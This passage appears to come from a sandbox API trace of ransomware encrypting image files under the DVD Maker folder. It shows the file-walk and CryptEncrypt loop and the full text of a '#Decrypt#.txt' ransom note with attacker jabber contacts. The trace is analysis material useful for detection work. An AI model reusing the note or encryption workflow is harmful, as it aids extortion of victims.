hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x183b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="decorative_rule.png", cAlternateFileName="")) returned 1 [0251.636] lstrcmpiW (lpString1="decorative_rule.png", lpString2="Windows") returned -1 [0251.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png") returned 74 [0251.636] StrStrIW (lpFirst="decorative_rule.png", lpSrch=".horseleader") returned 0x0 [0251.636] lstrcmpW (lpString1="decorative_rule.png", lpString2="#Decrypt#.txt") returned 1 [0251.636] lstrcmpW (lpString1="decorative_rule.png", lpString2="_uninstalling_.png") returned 1 [0251.636] lstrlenW (lpString=".testttjffg") returned 11 [0251.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", lpSrch=".testttjffg") returned 0x0 [0251.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.636] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.637] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdcc62f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdcc62f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.637] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.637] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png") returned 87 [0251.637] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.637] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.637] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.638] lstrlenW (lpString=".testttjffg") returned 11 [0251.638] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.638] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.638] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.638] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd80375, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd80375, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.638] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.638] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png") returned 93 [0251.638] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.638] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.638] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.639] lstrlenW (lpString=".testttjffg") returned 11 [0251.639] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.639] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.639] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.639] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fda64d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fda64d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.639] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.639] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png") returned 88 [0251.639] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.639] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.639] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.639] lstrlenW (lpString=".testttjffg") returned 11 [0251.639] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.639] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.639] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.639] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd340bb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd340bb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.640] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.640] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png") returned 94 [0251.640] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.640] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.640] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.640] lstrlenW (lpString=".testttjffg") returned 11 [0251.640] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.640] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.640] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.640] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.640] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.640] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png") returned 85 [0251.640] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.640] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.640] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.640] lstrlenW (lpString=".testttjffg") returned 11 [0251.640] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.640] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.641] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd5a218, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd5a218, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.641] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.641] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png") returned 91 [0251.641] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.641] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.641] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.641] lstrlenW (lpString=".testttjffg") returned 11 [0251.641] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.641] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.641] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vintage.png", cAlternateFileName="")) returned 1 [0251.641] lstrcmpiW (lpString1="vintage.png", lpString2="Windows") returned -1 [0251.641] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png") returned 66 [0251.642] StrStrIW (lpFirst="vintage.png", lpSrch=".horseleader") returned 0x0 [0251.642] lstrcmpW (lpString1="vintage.png", lpString2="#Decrypt#.txt") returned 1 [0251.642] lstrcmpW (lpString1="vintage.png", lpString2="_uninstalling_.png") returned 1 [0251.642] lstrlenW (lpString=".testttjffg") returned 11 [0251.642] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", lpSrch=".testttjffg") returned 0x0 [0251.642] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.642] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.642] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vintage.png", cAlternateFileName="")) returned 0 [0251.642] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.643] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\#Decrypt#.txt") returned 68 [0251.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.645] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.645] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.646] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.646] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.646] CloseHandle (hObject=0x158) returned 1 [0251.646] GetProcessHeap () returned 0x780000 [0251.647] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.647] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0251.647] lstrcmpiW (lpString1="Performance", lpString2="Windows") returned -1 [0251.647] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 59 [0251.647] lstrcmpW (lpString1="Performance", lpString2=".") returned 1 [0251.647] lstrcmpW (lpString1="Performance", lpString2="..") returned 1 [0251.647] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.647] GetProcessHeap () returned 0x780000 [0251.647] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.647] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*") returned 61 [0251.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.653] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.653] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\.") returned 61 [0251.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.653] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, 